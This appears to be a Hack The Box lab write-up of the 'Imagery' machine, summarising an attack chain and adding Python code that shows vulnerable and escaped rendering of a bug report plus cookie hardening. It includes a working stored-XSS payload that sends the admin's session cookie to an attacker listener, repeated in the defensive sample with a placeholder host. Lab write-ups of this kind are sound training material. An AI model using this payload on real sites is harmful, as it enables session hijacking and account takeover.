Imagery

Platform: Hack The Box

Season: 9

Difficulty: Medium

OS: Linux

Date: 2025-11-05

Author: x4cc3


Executive Summary

Imagery is a Medium Linux machine running a Flask image app on port 8000. An XSS via "Report a Bug" steals the admin session. The admin panel has LFI leaking the database with MD5 hashes. Command injection in image crop params gives a shell. An AES-encrypted backup is cracked for mark's password. A sudo-allowed binary (charcol) is exploited via cron job injection for root.

Recon

Port      Service
22/tcp    SSH
8000/tcp  HTTP — Flask image app

Imagery landing page

Registration page

Exploitation

XSS → Admin Cookie

<img src=1 onerror="document.location='http://10.10.15.55:8888/steal?c='+document.cookie">

Burpsuite inspection

Report a Bug feature

Submitted via "Report a Bug" — when the admin reviewed the report, the browser executed the payload and sent the session cookie to the attacker's listener.
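The same bug from the defender's side, as an added example that is not code from the box or the writeup: a hypothetical Flask-style view rendering the report body unescaped beside its hardened form, a parser-based check that flags markup that made it past the template, and the session-cookie flags that stop document.cookie from exposing the session. SAMPLE_REPORT, ATTACKER_HOST and the function names are constructed stand-ins, not the machine's own code.

```python
"""Stored XSS in a bug-report field: vulnerable rendering beside the hardened form."""
from html import escape
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Constructed sample report (hypothetical); ATTACKER_HOST is a placeholder.
SAMPLE_REPORT = {
    "title": "Upload fails",
    "body": '<img src=1 onerror="document.location=\'http://ATTACKER_HOST/steal?c=\'+document.cookie">',
}


def render_report_vulnerable(report):
    """Interpolates user-controlled text straight into the admin page,
    so the report body becomes live markup when the admin opens it."""
    return f"<h2>{report['title']}</h2><div class=\"body\">{report['body']}</div>"


def render_report_hardened(report):
    """HTML-encode every user-controlled field: '<', '>' and quotes become text."""
    return (f"<h2>{escape(report['title'])}</h2>"
            f"<div class=\"body\">{escape(report['body'])}</div>")


class _ActiveMarkupFinder(HTMLParser):
    """Collects start tags and on* attributes the browser would act on."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [n for n, _ in attrs if n.lower().startswith("on")]


def active_markup(html, trusted_tags=("h2", "div")):
    """Return (unexpected_tags, event_handlers) in rendered output. Any tag
    beyond the template's own means user input reached the page as markup."""
    p = _ActiveMarkupFinder()
    p.feed(html)
    return [t for t in p.tags if t not in trusted_tags], p.handlers


def session_cookie_header(token):
    """Set-Cookie line the app should emit for its session: HttpOnly keeps
    document.cookie from revealing it even if an XSS does get through."""
    c = SimpleCookie()
    c["session"] = token
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Lax"
    return c.output(header="Set-Cookie:")
```

Running active_markup over both renderings of SAMPLE_REPORT shows the vulnerable page carrying an extra img tag with an onerror handler and the hardened page carrying none.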